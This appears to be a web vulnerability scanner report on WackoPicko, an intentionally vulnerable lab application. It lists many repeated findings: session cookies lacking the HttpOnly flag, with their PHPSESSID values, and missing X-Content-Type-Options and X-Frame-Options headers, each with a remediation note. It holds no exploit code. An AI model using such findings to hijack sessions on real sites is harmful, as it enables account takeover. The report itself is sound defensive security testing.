A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=11
Parameter
PHPSESSID
Attack
knqtmo4j06f6vceq7hejtf2ql7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=10
Parameter
PHPSESSID
Attack
mgkto7tjfho7sut283313s11v2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=9
Parameter
PHPSESSID
Attack
7on14b3snkhfl710qppi62phc5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=8
Parameter
PHPSESSID
Attack
ub3n7og2p0vlmpp8ono431s1t1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=7
Parameter
PHPSESSID
Attack
s76merjj1k1jecnqbf4upn1ai1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/passcheck.php
Parameter
PHPSESSID
Attack
hmdvkmpt78s0g11idc9id3s8o2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926555
Parameter
PHPSESSID
Attack
1vljoojisdmba2cbi6p1dt3jr1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395012955
Parameter
PHPSESSID
Attack
uglpu7h37jrtlfmcpqsn7avp25; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099355
Parameter
PHPSESSID
Attack
u4mims6bklah44t7ufatmuiak6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185755
Parameter
PHPSESSID
Attack
lb6u9cdc9gce6no9uop5on59l7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272155
Parameter
PHPSESSID
Attack
pksol2i7ru6l9pc442ujadkiv7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358555
Parameter
PHPSESSID
Attack
126fkl17ufn46ub2jqkore52b1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395444955
Parameter
PHPSESSID
Attack
d2uia8euo7u98bs21l9sr27h30; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531355
Parameter
PHPSESSID
Attack
b61ngeffpbsrebphofvtcfm9j6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617755
Parameter
PHPSESSID
Attack
k197ba37mfe5lvhp4tgn9phjr0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1394926616
Parameter
PHPSESSID
Attack
qonl4ojkvrqg43g62jrnca9bd3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395013016
Parameter
PHPSESSID
Attack
s39d3eb75c2h9njn0he4p18mi2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099416
Parameter
PHPSESSID
Attack
8mln0d8dmd8heusmaf3i85k6b5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185816
Parameter
PHPSESSID
Attack
2lfiemor34h4vrnb8g8givi7p3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272216
Parameter
PHPSESSID
Attack
2l1uhu0mp36civmd4a6g4fh480; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358616
Parameter
PHPSESSID
Attack
o9814ldp10lnb58c6qguv779e4; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395445016
Parameter
PHPSESSID
Attack
ssh9j73p2ld9iv6cc3ue2fcvi1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531416
Parameter
PHPSESSID
Attack
6igta2os37mua6bb7sb7aed9c0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617816
Parameter
PHPSESSID
Attack
ro2nqfa7k1rslovsu8gjlgl836; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/users/similar.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/users/similar.php

Solution

Most modern Web browsers support the X-Frame-Options HTTP header; ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=14

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=14

Solution

Most modern Web browsers support the X-Frame-Options HTTP header; ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/upload/flowers/flweofoee

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/upload/flowers/flweofoee

Solution

Most modern Web browsers support the X-Frame-Options HTTP header; ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=15

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=15

Solution

Most modern Web browsers support the X-Frame-Options HTTP header; ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/upload/house/hodjjgld

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/upload/house/hodjjgld

Solution

Most modern Web browsers support the X-Frame-Options HTTP header; ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=11

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=11

Solution

Most modern Web browsers support the X-Frame-Options HTTP header; ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/upload/flowers/flowers

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/upload/flowers/flowers

Solution

Most modern Web browsers support the X-Frame-Options HTTP header; ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true